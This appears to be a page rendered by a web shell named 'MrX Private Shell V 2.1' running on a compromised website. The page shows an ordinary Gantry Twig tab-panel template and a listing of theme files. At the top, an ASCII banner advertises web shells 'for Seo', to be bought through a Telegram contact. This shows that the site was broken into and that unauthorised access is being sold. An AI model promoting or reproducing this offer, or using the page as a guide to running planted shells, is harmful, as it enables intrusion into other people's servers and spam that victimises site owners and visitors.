__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
{% extends '@nucleus/partials/particle.html.twig' %}
{% block particle %}
<div class="{{ particle.class|e }}">
{% if particle.title %}<h2 class="g-title">{{ particle.title|raw }}</h2>{% endif %}
<div class="g-contenttabs">
<div id="g-contenttabs-{{ id }}" class="g-contenttabs-container">
<ul class="g-contenttabs-tab-wrapper-container">
{% for item in particle.items %}
<li class="g-contenttabs-tab-wrapper">
<span class="g-contenttabs-tab-wrapper-head">
<a class="g-contenttabs-tab" href="#g-contenttabs-item-{{ id }}-{{ loop.index }}">
<span class="g-contenttabs-tab-title">{{ item.title|raw }}</span>
</a>
</span>
</li>
{% endfor %}
</ul>
<div class="clearfix"></div>
<ul class="g-contenttabs-content-wrapper-container">
{% for item in particle.items %}
<li class="g-contenttabs-tab-wrapper">
<div class="g-contenttabs-tab-wrapper-body">
<div id="g-contenttabs-item-{{ id }}-{{ loop.index }}" class="g-contenttabs-content">
{{ item.content|raw }}
</div>
</div>
</li>
{% endfor %}
</ul>
<div class="clearfix"></div>
</div>
</div>
</div>
{% endblock %}
{% block javascript %}
{% do gantry.load('jquery') %}
<script src="{{ url('gantry-theme://js/juitabs.js') }}"></script>
{% endblock %}
{% block javascript_footer %}
<script type="text/javascript">
jQuery(document).ready(function () {
jQuery('#g-contenttabs-{{ id }}').tabs({
show: {
{% if particle.animation == 'up' or particle.animation == 'down' or particle.animation == 'left' or particle.animation == 'right' %}
effect: 'slide',
direction: '{{ particle.animation }}',
{% else %}
effect: '{{ particle.animation|default('slide') }}',
{% endif %}
duration: 500
}
});
});
</script>
{% endblock %}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| contentcubes.html.twig | File | 2.55 KB | 0664 |
|
| contentcubes.yaml | File | 2.97 KB | 0664 |
|
| contenttabs.html.twig | File | 2.47 KB | 0664 |
|
| contenttabs.yaml | File | 1.28 KB | 0664 |
|
| copyright.html.twig | File | 808 B | 0664 |
|
| copyright.yaml | File | 1.25 KB | 0664 |
|
| horizontalmenu.html.twig | File | 377 B | 0664 |
|
| horizontalmenu.yaml | File | 1.02 KB | 0664 |
|
| owlcarousel.html.twig | File | 3.38 KB | 0664 |
|
| owlcarousel.yaml | File | 2.79 KB | 0664 |
|
| totop.html.twig | File | 623 B | 0664 |
|